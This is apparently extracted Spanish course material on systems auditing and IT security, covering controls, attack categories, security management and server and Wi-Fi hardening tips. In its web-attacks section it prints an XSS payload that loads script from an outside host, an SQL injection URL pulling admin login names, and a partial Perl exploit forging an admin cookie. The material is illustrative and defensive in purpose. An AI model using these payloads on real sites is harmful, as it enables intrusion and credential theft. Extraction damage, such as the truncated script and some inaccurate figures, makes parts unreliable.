    ejecutadas su funcin es establecer, ejecutar, modificar y mantener actividades de control de

    modo que la fiabilidad global del sistema sea aceptable.

    Se detallan algunos de los controles ms importantes:

    1. Controles de autenticidad: Para verificar la identidad de un usuario que quiera tomar

    alguna accin en el sistema, como passwords, nmeros de identificacin personal.

    2. Controles de precisin: Para asegurar la correccin de la informacin y procesos en el

    sistema, como un programa o rutina que controle el tipo de dato ingresado.

    3. Controles de completitud: Asegurarse de que no hay prdida de informacin y que todo

    proceso se concluya adecuadamente, como revisar que no haya dos campos vacos.

    4. Controles de redundancia: Para asegurar que la informacin es procesada una sola vez.

    5. Controles de privacidad: Impedir que usuarios no autorizados accedan a informacin

    protegida.

    6. Controles de auditora: Tratar de asegurar que queden registrados cronolgicamente todos

    los eventos que ocurren en el sistema. Este registro es muy importante para responder

  • preguntas, determinar irregularidades, detectar las consecuencias de un error. Deben

    mantenerse dos tipos de auditora, la auditora de cuentas y la auditora de operaciones.

    7. Controles de existencia: Asegurar la disponibilidad continua de todos los recursos y datos

    del sistema.

    8. Controles de salvaguarda de activos: Para asegurar que todos los recursos dentro del

    sistema estn protegidos de la destruccin o corrupcin.

    9. Controles de eficacia: Asegurar que el sistema alcanza sus objetivos.

    10. Controles de eficiencia: Asegurar que el sistema utiliza el mnimo nmero de recursos para

    conseguir sus objetivos.

    Estos tipos de control no son mutuamente excluyentes. Un control puede participar en varias

    categoras.

    Al evaluarse los efectos de un control sobre la fiabilidad de un componente, se consideran varios

    atributos del control:

    - La bsqueda del tipo de control adecuado, dada la naturaleza del proceso de actividades

    depende del sistema. Adems algunas veces el controlar algn tipo de error o irregularidad

    es mucho ms caro que las prdidas que estos producen.

    - Un atributo a considerar cuando se evala la efectividad del control es si el control

    previene, detecta o corrige errores.

    - Otro atributo a tener en cuenta es el nmero de componentes necesarios para realizar el

    control.

    - Finalmente han de considerarse el nmero de subsistemas afectados por el control. Esta

    funcin comprueba si se trata de un componente compartido, es decir, que realiza

    actividades en varios subsistemas.

    El auditor se preocupa en conseguir que los sistemas se encuentren en total operatividad, para

    lograr esto se deben realizar una serie de Controles Tcnicos Generales de Operatividad, y dentro

    de ellos unos Controles Tcnicos Especficos de Operatividad, los que deben estar desarrollados

    previamente.

    CONTROLES TCNICOS GENERALES Estos controles verifican la compatibilidad entre el Sistema Operativo y el Software de base con

    todos los subsistemas existentes, as como la compatibilidad entre el Hardware y el Software

    instalado. La importancia de estos controles en las instalaciones se da debido a que como existen

    entornos de trabajo muy diferenciados se obliga a contratar diferentes productos de software

    bsico, existiendo el riesgo de que se pueda desaprovechar parte del software que ha sido

    adquirido. Existe la posibilidad de que cada Centro de Procesamiento de Datos sea operativo

    trabajando slo e independiente, pero lo que no podr ser posible ser la interconexin e

    intercomunicacin de todos los centros de procesos de datos si es que no existen productos

  • compatibles y comunes.

    CONTROLES TCNICOS ESPECFICOS Son tan importantes como los Controles Tcnicos Generales para lograr la Operatividad de los

    Sistemas. Encargndose de verificar el funcionamiento correcto de partes especficas del sistema,

    como parmetros de asignacin automtica de espacio en el disco, los cuales pueden impedir su

    uso posterior por una seccin diferente a la que lo gener. Segn las seguridades fsicas y lgicas

    detalladas anteriormente se tiene:

    Control de Acceso como seguridad fsica

    El control de acceso no slo requiere la capacidad de identificacin, sino tambin asociarla a la

    apertura o cerramiento de puertas, permitir o negar acceso basado en restricciones de tiempo,

    rea o sector dentro de una empresa o institucin.

    - Utilizacin de Guardias

    - Utilizacin de Detectores de Metales

    - Utilizacin de Sistemas Biomtricos (identifican a la persona por lo que es manos, ojos,

    huellas digitales y voz)

    - Proteccin Electrnica

    Controles de Acceso como seguridad lgica

    Estos controles pueden implementarse en el Sistema Operativo, sobre los sistemas de aplicacin,

    en bases de datos, en un paquete especfico de seguridad o en cualquier otro utilitario.

    Constituyen una importante ayuda para proteger al sistema operativo de la red, al sistema de

    aplicacin y dems software de la utilizacin o modificaciones no autorizadas; para mantener la

    integridad de la informacin (restringiendo la cantidad de usuarios y procesos con acceso

    permitido) y para resguardar la informacin confidencial de accesos no autorizados.

    Es conveniente tener en cuenta otras consideraciones referidas a la seguridad lgica, como por

    ejemplo las relacionadas al procedimiento que se lleva a cabo para determinar si corresponde un

    permiso de acceso (solicitado por un usuario) a un determinado recurso.

    Al respecto, el National Institute for Standars and Technology (NIST, Instituto Nacional de

    estndares y tecnologa) ha resumido los siguientes estndares de seguridad que se refieren a los

    requisitos mnimos de seguridad en cualquier empresa:

    - Identificacin y Autentificacin

    - Roles

    - Transacciones

    - Limitaciones a los Servicios

    - Modalidad de Acceso

    - Ubicacin y Horario

    - Control de Acceso Interno

  • - Control de Acceso Externo

    - Administracin

    SEGURIDAD INFORMATICA Existen varias razones por las que a todos los niveles no se le ha dado a suficiente importancia:

    1. El riesgo y las consecuencias de ignorarlo eran mnimos

    2. Siempre ha sido incomoda: mucho esfuerzo -> poco resultado

    3. Los posibles ataques requeran muy altos niveles de conocimiento.

    4. El acceso al conocimiento y a las redes era muy limitado

    Qu es el riesgo?

    Riesgo = vulnerabilidades * amenazas

    Si no hay amenazas no hay riesgo Si no hay vulnerabilidades no hay riesgo

    Factores que se consideraban fuentes de amenazas:

  • Preocupaciones y riesgos actuales

    Si adems tenemos en cuenta que:

    Hoy da todo esta conectado con todo

    El nmero de usuarios de la red crece exponencialmente

    Cada vez hay ms sistemas y servicios en la red

    El nivel de riesgo es suficientemente alto como para empezar a pensar en la seguridad como algo

    imprescindible

    Tipos de ataques actuales:

    Ataques hbridos

    Son ataques en los que se mezclan ms de una tcnica:

    DOS, DDOS, Exploits, Escaneos, Troyanos, Virus, Buffer Overflows, Inyecciones, etc.

    Suelen ser de muy rpida propagacin y siempre se basan en alguna vulnerabilidad de algn

    sistema.

    Por ejemplo los gusanos Blaster, Sasser, o Slammer se propagaron por todo el planeta en cuestin

    de pocas horas gracias a una mezcla de tcnicas de uso de vulnerabilidad, Buffer Overflows,

    escaneado de direcciones, transmisin va Internet, y mimetizacin en los sistemas.

    Como curiosidad: el 75% de los ataques tienen como teln de fondo tcnicas de Buffer Overflow

    no podran ser evitadas?

    Tipos de ataques actuales:

    Ingeniera social

    Son ataques en los que se intenta engaar a algn usuario para hacerle creer como cierto algo que

    no lo es.

    - Buenos das, es la secretaria del Director del Departamento?

    - Si digame, que desea?

    - Soy Pedro, tcnico informtico del Centro de Apoyo a Usuarios y me han avisado para

    reparar un virus del ordenador del director pero la clave que me han indicado para entrar

    no es correcta,

    Otros ataques de este tipo son:

    Farming

    SPAM

    Pishing

    Cajeros automticos

    ETC.

  • Ingeniera social

    El ataque que ms preocupa hoy en da a las grandes organizaciones, sobre todo en el sector de

    banca online es, con diferencia, el PISHING:

    Qu preocupa y qu no en un proyecto de seguridad?

    Existe un problema subyacente en la mente de TODOS los Directores de informtica de las grandes

    compaas que nunca debemos olvidar si queremos tener xito en la implantacin de un sistema

    de seguridad:

    La compaa puede vivir sin seguridad pero no sin comunicaciones

    Si un sistema de seguridad, por muy maravilloso que sea, destinado a evitar problemas que

    pueden no haberse producido aun puede generar problemas

    Nuevos, ese sistema NO SERA ACEPTADO.

    Donde queda la criptografa en todo esto?

    Los estndares actuales de cifrado de la informacin (AES, DES, RSA, MD5, etc., etc.) son

    globalmente aceptados como buenos y suficientes en la mayora de los casos, quedando su

    estudio reducidos a pocos entornos, Universidades, Fuerzas del Orden, Ministerios, etc.

    La criptografa capta la atencin general pocas veces, pero cuando lo hace suele ser por algo serio,

    cuando algn protocolo y/o algoritmo es reventado. Por ejemplo, WEP, el cifrado que usan las

  • redes WiFi basado en RC4 que puede ser descifrado si se consigue una captura de trfico

    suficientemente grande.

    El Coste de la seguridad

    El esfuerzo tanto econmico como humano de los Departamentos de Seguridad debe buscar

    siempre cuatro objetivos:

    1. Disponibilidad: Se consideran sistemas aceptables a partir de dos nueves, esto es:

    disponibles el 99,99% del tiempo. La inversin por cada nueve extra es siempre muy

    elevada.

    2. Confidencialidad: Seguridad keep the good giys in

    3. Integridad: Seguridad Keep the bad guys out

    4. Cumplimiento de la legalidad: LOPD, Sarbanes-Oxley, ISO17799

    El esfuerzo econmico en seguridad es imposible de medir pero como ste debe ser siempre

    proporcional al riesgo de perdidas, que SI ES MEDIBLE, si es posible hacer estimaciones razonables

  • Problemas colaterales de la seguridad

    en las grandes compaas

    1. Costes & ROI (Return of Investment)

    1. Costes de personal

    a. Difcil encontrar tcnicos cualificados

    b. Muy alta rotacin en segn que sectores

    2. Costes tecnolgicos: HW, SW, ROI

    3. Costes ocultos (a menudo elevados)

    4. Costes de cumplimiento de la legalidad (LOPD, Sarbanes-Oxley, etc)

    5. Costes de cumplimiento de polticas y normativas

    6. Costes de seguros (aprox. 25% de las compaas)

    Problemas colaterales de la seguridad en las grandes compaas

    2. De organizacin

    Lleva mucho tiempo y esfuerzo conocer e integrar cualquier sistema de seguridad cuando hay

    implicado ms de un departamento.

    Se estima que 30 minutos de un Hacker pueden suponer una semana de trabajo de un ingeniero

    con experiencia para reparar lo daado y prevenir nuevos incidentes

    3. De garanta de disponibilidad

    4. De garanta de ajuste a normativa y legalidad

    Entonces Cunto se suele gastar en seguridad?

  • TECNOLOGAS Qu tecnologas existen y cul es su estado actual?

    Desde el punto de vista empresarial existen dos posibles enfoques para clasificar los sistemas de

    seguridad:

    1. Segn coste:

    a. Software libre: Linux, Snort, Nessus, Ethereal, etc. Suele ser difcil implantar este

    tipo de sistemas salvo que haya verdaderos problemas presupuestarios.

    b. Sistemas propietarios: Microsoft, Sun, IBM, Symantec, ISS, Checkpoint, Trend, etc.

    Gran calidad debida a la competencia

    2. Desde el punto de vista de su utilidad:

    a. Keep the good guys in: VPN, PKI, RAS, Radius, Tacacs+, Single Sing On, etc.

    b. Keep the bad guys out: AntiVirus, FW, IPS, IDS, ADS, etc.

    Qu grado de implantacin tiene cada una?

  • Cules son las tendencias actuales ?

    Firewalls

    Todas las compaas montan sistemas de filtrado de paquetes, bien mediante FireWalls, bien

    mediante listas de control de acceso en routers.

    Existen FW personales cuya utilidad suele cuestionarse (a favor de los IPS personales) Antivirus

    Se montan siempre a dos niveles: a nivel de red (para filtrar correo electrnico principalmente) y a

    nivel de puesto de trabajo.

    IDS

    Los sistemas de deteccin de intrusos han estado ayudando a detectar problemas en las redes

    durante aos pero su incapacidad de detener los ataques que ellos mismos detectaban y la gran

    cantidad de alarmas que generaban (imposibles de perseguir) han dado paso a los IPSs

    IPS

    Estn en pleno auge. Son capaces de detectar y detener tantos ataques conocidos como

    desconocidos, detectar y detener virus, troyanos, aislar hackers cuando se les detecta y hasta

    proteger a los otros elementos de seguridad de la red, por ejemplo a los Firewalls.

    ADS

    Sistemas de deteccin de anomalias. Son totalmente novedosos y an es pronto para hablar de

    sus resultados reales.

    Single Sign-on

    Han sido, son y seguirn siendo de gran utilidad, mxime en las grandes empresas donde la gran

    variedad de sistemas y claves a memorizar convierten los post-it junto a los monitores en algo

    comn.

    Control de acceso a red

    Microsoft y Cisco estn en plena pugna por llevarse el gato al agua en lo que a control de acceso

    a red se refiere y aunque recientemente anunciaron su intencin de colaborar, lo cierto es que

    cada uno sigue por su lado, NAP, NAC el tiempo dir

    VPN + PKI

    Durante aos el binomio VPN + PKI han dominado el mundo de los accesos remotos seguros pero

    la necesidad de instalar un cliente de VPN en el PC los ha hecho incmodos. Estn dejando paso a

    marchas forzadas a las VPN + SSL.

    VPN + SSL

    Sin ms complejidad para el cliente que conectarse a una pgina web segura de la compaa para

    poder entrar en ella va VPN. Sencillas, cmodas y ligeras. Existen ya sistemas basados en

    appliances de red.

  • ROLES INVOLUCRADOS EN SEGURIDAD USUARIOS

    Usuarios comunes:

    Los usuarios se acostumbran a usar la tecnologa sin saber como funciona o de los

    riesgos que pueden correr.

    Son el punto de entrada de muchos de los problemas crnicos.

    Son El eslabn ms dbil en la cadena de seguridad.

    2 enfoques para controlarlos:

    Principio del MENOR PRIVILEGIO POSIBLE:

    Reducir la capacidad de accin del usuario sobre los sistemas.

    Objetivo: Lograr el menor dao posible en caso de incidentes.

    EDUCAR AL USUARIO:

    Generar una cultura de seguridad. El usuario ayuda a reforzar y aplicar los

    mecanismos de seguridad.

    Objetivo: Reducir el nmero de incidentes

    CREADORES DE SISTEMAS

    Creando Software:

    El software moderno es muy complejo y tiene una alta probabilidad de contener

    vulnerabilidades de seguridad.

    Un mal proceso de desarrollo genera software de mala calidad. Prefieren que salga

    mal a que salga tarde.

    Usualmente no se ensea a incorporar requisitos ni protocolos de seguridad en los

    productos de SW.

    Propiedades de la Informacin en un Trusted System

    Confidencialidad: Asegurarse que la informacin en un sistema de cmputo y la

    transmitida por un medio de comunicacin, pueda ser leda SOLO por las personas

    autorizadas.

  • Autenticacin: Asegurarse que el origen de un mensaje o documento electrnico

    esta correctamente identificado, con la seguridad que la entidad emisora o

    receptora no esta suplantada.

    Integridad: Asegurarse que solo el personal autorizado sea capaz de modificar la

    informacin o recursos de cmputo.

    No repudiacin: Asegurarse que ni el emisor o receptor de un mensaje o accin sea

    capaz de negar lo hecho.

    Disponibilidad: Requiere que los recursos de un sistema de cmputo estn

    disponibles en el momento que se necesiten.

    Ataques contra el flujo de la informacin

    FLUJO NORMAL

    Los mensajes en una red se envan a partir de un emisor a uno o varios

    receptores

    El atacante es un tercer elemento; en la realidad existen millones de

    elementos atacantes, intencionales o accidentales.

    Emisor Receptor

    Atacante

  • INTERRUPCION

    El mensaje no puede llegar a su destino, un recurso del sistema es destruido

    o temporalmente inutilizado.

    Este es un ataque contra la Disponibilidad

    Ejemplos: Destruccin de una pieza de hardware, cortar los medios de

    comunicacin o deshabilitar los sistemas de administracin de archivos.

    INTERCEPCION

    Una persona, computadora o programa sin autorizacin logra el acceso a un

    recurso controlado.

    Es un ataque contra la Confidencialidad.

    Ejemplos: Escuchas electrnicos, copias ilcitas de programas o datos,

    escalamiento de privilegios.

    Emisor Receptor

    Atacante

    Emisor Receptor

    Atacante

  • MODIFICACION

    La persona sin autorizacin, adems de lograr el acceso, modifica el

    mensaje.

    Este es un ataque contra la Integridad.

    Ejemplos: Alterar la informacin que se transmite desde una base de datos,

    modificar los mensajes entre programas para que se comporten diferente.

    FABRICACION

    Una persona sin autorizacin inserta objetos falsos en el sistema.

    Es un ataque contra la Autenticidad.

    Ejemplos: Suplantacin de identidades, robo de sesiones, robo de

    contraseas, robo de direcciones IP, etc...

    Es muy difcil estar seguro de quin esta al otro lado de la lnea.

    Emisor Receptor

    Atacante

    Emisor Receptor

    Atacante

  • GERENTES

    Para que esperar

    Si gastas ms dinero en caf que en Seguridad Informtica, entonces vas a ser

    hackeado, es ms, mereces ser hackeado

    La mayora de las empresas incorporan medidas de seguridad hasta que han tenido

    graves problemas. para que esperarse?

    Siempre tenemos algo de valor para alguien

    Razones para atacar la red de una empresa:

    $$$, ventaja econmica, ventaja competitiva, espionaje poltico, espionaje

    industrial, sabotaje,

    Empleados descontentos, fraudes, extorsiones, (insiders).

    Espacio de almacenamiento, ancho de banda, servidores de correo (SPAM),

    poder de cmputo, etc

    Objetivo de oportunidad.

    Siempre hay algo que perder:

    Cunto te cuesta tener un sistema de cmputo detenido por causa de un incidente

    de seguridad?

    Costos econmicos (perder oportunidades de negocio).

    Costos de recuperacin.

    Costos de reparacin.

    Costos de tiempo.

    Costos legales y judiciales.

    Costos de imagen.

    Costos de confianza de clientes.

    Perdidas humanas (cuando sea el caso).

    Qu hacer?

    Los altos niveles de la empresa tienen que apoyar y patrocinar las iniciativas de

    seguridad.

    Las polticas y mecanismos de seguridad deben de exigirse para toda la empresa.

  • Con su apoyo se puede pasar fcilmente a enfrentar los problemas de manera

    proactiva (en lugar de reactiva como se hace normalmente)

    HACKER CRACKER

    Cracking:

    Los ataques son cada vez mas complejos.

    Cada vez se requieren menos conocimientos para iniciar un ataque.

    Mxico es un paraso para el cracking.

    Por qu alguien querra introducirse en mis sistemas?

    Por qu no? Si es tan fcil:

    Descuidos

    Desconocimiento

    Negligencias (factores humanos).

    Quienes atacan los sistemas?

    Gobiernos Extranjeros.

    Espas industriales o polticos.

    Criminales.

    Empleados descontentos y abusos internos.

    Adolescentes sin nada que hacer

    Niveles de Hackers:

    Nivel 3: (ELITE) Expertos en varias reas de la informtica, son los que usualmente

    descubren los puntos dbiles en los sistemas y pueden crear herramientas para

    explotarlos.

    Nivel 2: Tienen un conocimiento avanzado de la informtica y pueden obtener las

    herramientas creadas por los de nivel 3, pero pueden darle usos ms preciso de

    acuerdo a los intereses propios o de un grupo.

    Nivel 1 o Script Kiddies: Obtienen las herramientas creadas por los de nivel 3, pero

    las ejecutan contra una vctima muchas veces sin saber lo que estn haciendo.Son

    los que con ms frecuencia realizan ataques serios.

  • Cualquiera conectado a la red es una vctima potencial, sin importar a que se dedique, debido a

    que muchos atacantes slo quieren probar que pueden hacer un hack por diversin.

    ADMINISTRADORES DE T.I.

    ADMINISTRADORES DE TI:

    Son los que tienen directamente la responsabilidad de vigilar a los otros roles.

    (aparte de sus sistemas).

    Hay actividades de seguridad que deben de realizar de manera rutinaria.

    Obligados a capacitarse, investigar, y proponer soluciones e implementarlas.

    Tambin tiene que ser hackers: Conocer al enemigo, proponer soluciones

    inteligentes y creativas para problemas complejos.

    Puntos Dbiles en los Sistemas

    Qu se debe asegurar ?

    Siendo que la informacin debe considerarse como un recurso con el que cuentan las

    Organizaciones y por lo tanto tiene valor para stas, al igual que el resto de los activos, debe estar

    debidamente protegida.

    Contra qu se debe proteger la Informacin ?

    La Seguridad de la Informacin, protege a sta de una amplia gama de amenazas, tanto de orden

    fortuito como destruccin, incendio o inundaciones, como de orden deliberado, tal como fraude,

    espionaje, sabotaje, vandalismo, etc.

  • Qu se debe garantizar?

    Confidencialidad: Se garantiza que la informacin es accesible slo a

    aquellas personas autorizadas a tener acceso a la misma.

    Integridad: Se salvaguarda la exactitud y totalidad de la informacin y los

    mtodos de procesamiento.

    Disponibilidad: Se garantiza que los usuarios autorizados tienen acceso a la

    informacin y a los recursos relacionados con la misma toda vez que se

    requiera.

    Porqu aumentan las amenazas?

    Las Organizaciones son cada vez mas dependientes de sus Sistemas y Servicios de Informacin,

    por lo tanto podemos afirmar que son cada vez mas vulnerables a las amenazas concernientes a su

    seguridad. Algunas causas son:

    Crecimiento exponencial de las Redes y Usuarios Interconectados

    Profusin de las BD On-Line

    Inmadurez de las Nuevas Tecnologas

    Alta disponibilidad de Herramientas Automatizadas de Ataques

    Nuevas Tcnicas de Ataque Distribuido (Ej:DDoS)

    Tcnicas de Ingeniera Social

    Cules son las amenazas?

    Accidentes: Averas, Catstrofes, Interrupciones.

    Errores: de Uso, Diseo, Control.

    Intencionales Presenciales: Atentado con acceso fsico no autorizado.

    Intencionales Remotas: Requieren acceso al canal de comunicacin.

    Interceptacin pasiva de la informacin (amenaza a la

    CONFIDENCIALIDAD).

    Corrupcin o destruccin de la informacin (amenaza a la

    INTEGRIDAD).

    Suplantacin de origen (amenaza a la AUTENTICACIN)

    Cmo resolver el desafo de la seguridad informtica?

  • Las tres primeras tecnologas de proteccin ms utilizadas son el control de

    acceso/passwords (100%), software anti-virus (97%) y firewalls (86%)

    Los ataques ms comunes durante el ltimo ao fueron los virus informticos (27%)

    y el spammimg de correo electrnico (17%) seguido de cerca (con un 10%) por los

    ataques de denegacin de servicio y el robo de notebook:

    El problema de la Seguridad Informtica est en su Gerenciamiento y no en las tecnologas

    disponibles

    Aspectos Legales

    Requerimiento bsico

    Apoyo de la Alta Gerencia

    RRHH con conocimientos y experiencia

    RRHH capacitados para el da a da

    Recursos Econmicos

    Tiempo

    Anlisis de Riesgos

    Se considera Riesgo Informtico, a todo factor que pueda generar una

    disminucin en:

    Amenazas Internas

    Externas

    Proteccin de la Informacin

    Confidencialidad Integridad Disponibilidad

  • Confidencialidad Disponibilidad - Integridad

    Determina la probabilidad de ocurrencia

    Determina el impacto potencial

    Modelo de Gestin

    Poltica de Seguridad:

    Conjunto de Normas y Procedimientos documentados y comunicados, que tienen por objetivo

    minimizar los riesgos informticos mas probables

    Plan de Contingencias

    Conjunto de Normas y Procedimientos documentados y comunicados, cuyo objetivo es recuperar

    operatividad mnima en un lapso adecuado a la misin del sistema afectado, ante emergencias

    generadas por los riesgos informticos

    Involucra

    Uso de herramientas

    Activos Amenazas

    Impactos Vulnerabilidades

    Riesgos

    Funcin

    Correctiva

    Reduce

    Funcin

    Preventiva

    Reduce

    Involucra

    Uso de herramientas

    Cumplimiento de Tareas por parte de

    personas

  • Cumplimiento de Tareas por parte de personas

    Control por Oposicin

    Auditora Informtica Interna capacitada

    Equipo de Control por Oposicin Formalizado

    Outsourcing de Auditora

    Herramientas:

    Copias de Resguardo

    Control de Acceso

    Encriptacin

    Antivirus

    Barreras de Proteccin

    Sistemas de Deteccin de Intrusiones

    Uso de Estndares

    Norma ISO/IRAM 17.799

    Estndares Internacionales

    - Norma basada en la BS 7799

    - Homologada por el IRAM

    ORGANIZACION DE LA SEGURIDAD

    Infraestructura de la Seguridad de la Informacin

    Seguridad del Acceso de terceros

    Servicios provistos por otras Organizaciones

    CLASIFICACION Y CONTROL DE BIENES

    Responsabilidad de los Bienes

    Clasificacin de la Informacin

    SEGURIDAD DEL PERSONAL

    Seguridad en la definicin y la dotacin de tareas

    Capacitacin del usuario

    Respuesta a incidentes y mal funcionamiento de la Seguridad

  • SEGURIDAD FISICA Y AMBIENTAL

    reas Seguras

    Seguridad de los Equipos

    Controles generales

    GESTION DE LAS COMUNICACIONES Y LAS OPERACIONES

    Procedimientos operativos y responsabilidades

    Planificacin y aceptacin del Sistema

    Proteccin contra el software maligno

    Tares de acondicionamiento

    Administracin de la red

    Intercambio de informacin y software

    CONTROL DE ACCESO

    Requisitos de la Organizacin para el control de acceso

    Administracin del acceso de usuarios

    Responsabilidades de los usuarios

    Control de acceso de la Red

    Control de acceso al Sistema Operativo

    Control de acceso de las Aplicaciones

    Acceso y uso del Sistema de Monitoreo

    Computadoras mviles y trabajo a distancia

    DESARROLLO Y MANTENIMIENTO DE LOS SISTEMAS

    Requisitos de Seguridad de los Sistemas

    Seguridad de los Sistemas de Aplicacin

    Controles Criptogrficos

    Seguridad de los archivos del Sistema

    Seguridad de los procesos de desarrollo y soporte

  • DIRECCION DE LA CONTINUIDAD DE LA ORGANIZACION

    Aspectos de la direccin de continuidad de la Organizacin

    CUMPLIMIENTO

    Cumplimiento con los requisitos legales

    Revisin de la Poltica de seguridad y del Cumplimiento Tcnico

    Consideracin de las Auditoras del Sistema

    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Ataques Internos

    - Premeditacin (Empleados mal intencionados o ex empleados con informacin privilegiada)

    - Descuido

    - Ignorancia

    - Indiferencia de las politicas de seguridad

    Ataques externos

    - - Hackers, Crackers, Lammers, Script-Kiddies

    - - Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.

    Ataques Internos

    Suplantacin de identidad

    Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)

    Robo de informacin (Ej: para la competencia)

    Virus, Troyanos, Gusanos

    Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc

    Keylogging - Keycatching

    Keycatcher:

  • Ataques Externos

    Ataques contra servicios WEB

    Cross Site Scripting (XSS)

    SQL Injection

    Exploits

    Robo de Identidad

    Denegacin de Servicio (DoS) y Denegacin de Servicio Distribuido (DDoS)

    SPAM

    VIRUS

    Phishing (Whishing, Hishing)

    Troyanos

    XSS:

    http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='http:

    //h4k.in/i.js';document.body.appendChild(a);//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E

  • SQL Injection:

    http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM

    admin_login--

    Ejemplo de un exploit en PERL:

    #!/usr/bin/perl

    use LWP::UserAgent;

    use HTTP::Cookies;

    $host=shift;

    if ($host eq "") {

    print "Usage: webeye-xp.pl \n";

    exit;

    }

    my $browser = LWP::UserAgent->new();

    my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0;

    path=/;");

    $t = $resp->content;

    #print $t;

    ";

    COMO NOS DEFENDEMOS?

    Debemos crear una lista de mandamientos que debemos seguir al pie de la letra.

    No olvidarse que el hecho de no cumplir con alguno de estos mandamientos inevitablemente

    caeremos en un mayor riesgo para los servicios que queremos proteger.

    LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD

    Siempre respetar las polticas de seguridad

    Siempre tener nuestros servicios actualizados a la ltima versin conocida estable

    Utilizar mecanismos de criptografa para almacenar y transmitir datos sensibles

    Cambiar las claves cada cierto tiempo

    Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no

    vulnerables

  • Estar siempre alerta. Nunca pensar a nosotros nadie nos ataca.

    No dejar respaldos con informacin sensible en directorios web

    No usar las mismas claves para servicios distintos (ej, la clave de root sea la misma que la

    de MySQL)

    SERVICIOS DE INTERNET

    - Cambiar los puertos por defecto

    - Garantizar el acceso solo a cuentas especficas

    - Aplicar tcnicas de Hardening

    - Para servicios privados y confidenciales utilizar tneles seguros (VPN cifradas) en Internet y

    redes no seguras

    - Eliminar todos los banners posibles y sobre todo las versiones

    - Habilitar mdulos de seguridad (Ej mod_security en Apache)

    - Levantar Firewalls e IDS/IPS

    - Crear cuentas de sistema restringidas (aunque no tengan privilegios)

    SERVICIOS DE INTERNET

    - Nunca trabajar con root si no es estrictamente necesario

    - Proteger con doble contrasea si es posible

    - Elegir contraseas seguras, mezclando maysculas, minsculas, nmeros y caracteres

    especiales. Las claves no deben ser palabras coherentes (ej: Admin25)

    - Cerrar puertos y eliminar aplicaciones innecesarias

    - Borrar robots.txt y estadsticas pblicas

    - Proteger las URL (ej: mod_rewrite)

    SERVICIOS DE INTERNET

    Tener cuidado con los archivos temporales en directorios WEB. Ejemplo:

    index.php~ (terminados en caracter squiggle o pigtail (literalmente: cola de chancho)

    - Realizar respaldos peridicamente y probar que funcionen

    - Conocer las tcnicas de ataque ms conocidas

    - Auditar los cdigos con herramientas de seguridad

  • - Si ejecutan algn servidor de base de datos, permitir solamente comunicacin con interfaz

    loopback y no dejar sin contrasea las bases de datos.

    - En lo posible no utilizar servicios como:

    - WEBMIN

    - phpMyAdmin

    - Interfaces WEB en routers o dispositivos de red

    UN POCO MAS DE SEGURIDAD CON APACHE Y PHP

    Apache. En httpd.conf activar las siguientes directivas:

    ServerTokens Prod

    ServerSignature Off

    ServerAdmin

    habilitar mod_security y mod_rewrite

    PHP .En php.ini

    php_expose=off

    esconde php

    mode_safe=on

    evita que se ejecuten funciones como system(), passthru(), exec(), etc.

    evitar scripts con phpinfo();

    Algunos ejemplos:

  • PROTECCIN DE REDES WI-FI EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIN FSICA (No hay cables) LO QUE

    CONLLEVA A QUE SEA MS FCIL ACCEDER A ELLAS REMOTAMENTE

    EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA REDUCIR EL RIESGO DE ATAQUES.

    Direccin: http://www.sitioweb.com/config.php~

  • Apagar el router o access point cuando no se ocupe

    Nunca entregar la clave Wi-Fi a terceros

    Utilizar claves de tipo WPA2. Como segunda opcin WPA y en el peor de los casos WEP

    (128 y 64 bits)

    Habilitar el control de acceso por MAC. Son fciles de clonar pero pone una barrera ms

    Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)

    Deshabilitar el acceso inalmbrico a la configuracin

    Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000)

    Desactivar el broadcasting SSID

    Desactivar DHCP. Utilizar slo IP manuales dentro de rangos poco convencionales. (Ej:

    90.0.10.0 90.0.10.254)

    Usar VPN si fuese posible.

    Cambiar regularmente las claves Wi-Fi (tanto administracin como clave de red).

    Guardar bien las claves de administracin

    Usar contraseas complicadas. (Ej: E_aR@_1-x

    No usar dispositivos Wi-Fi cerca de hornos microondas ni telfonos inalmbricos

    Realizar un scaneo local de las redes disponibles para evitar interferencias.

    LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11

    HERRAMIENTAS DE SEGURIDAD COMERCIALES

    GFI LANGUARD SECURITY SCANNER www.gfi.com

    N-Stalker (ex N-Stealth) www.nstalker.com

  • ACUNETIX WEB SCANNER www.acunetix.com

    HERRAMIENTAS DE SEGURIDAD GRATIS NMAP (Network Mapper) www.insecure.org/nmap

    NESSUS www.nessus.org


Auditorias de Sistemas de Gestion de Calidad

Auditorias de Sistemas de Gestion de Calidad

AUDITORIAS HSEQ

AUDITORIAS HSEQ

calidad de la auditorias de sistemas de información

calidad de la auditorias de sistemas de información

Resumen Sistemas Newtonianos

Resumen Sistemas Newtonianos

Auditorias Fi

Auditorias Fi

SISTEMAS OPERATIVOS - RESUMEN

SISTEMAS OPERATIVOS - RESUMEN

Auditorias Energeticas

Auditorias Energeticas

Guia Auditorias

Guia Auditorias

auditorias ambientales

auditorias ambientales

Metodología Para Realizar Auditorias de Sistemas Computacionales

Metodología Para Realizar Auditorias de Sistemas Computacionales

Auditorias internas sistemas de la calidad formacion auditores

Auditorias internas sistemas de la calidad formacion auditores

auditorias Lourival_Tavares

auditorias Lourival_Tavares

Auditorias energeticas.doc

Auditorias energeticas.doc

resumen sistemas informaticos

resumen sistemas informaticos

RESUMEN SISTEMAS OPERATIVOS

RESUMEN SISTEMAS OPERATIVOS

AUDITORIAS INTERNAS

AUDITORIAS INTERNAS

AUDITORIAS DE SISTEMAS INTEGRADOS DE GESTIÓN

AUDITORIAS DE SISTEMAS INTEGRADOS DE GESTIÓN

AUDITORIAS AMBIENTALES.

AUDITORIAS AMBIENTALES.

Resumen sistemas economicos

Resumen sistemas economicos

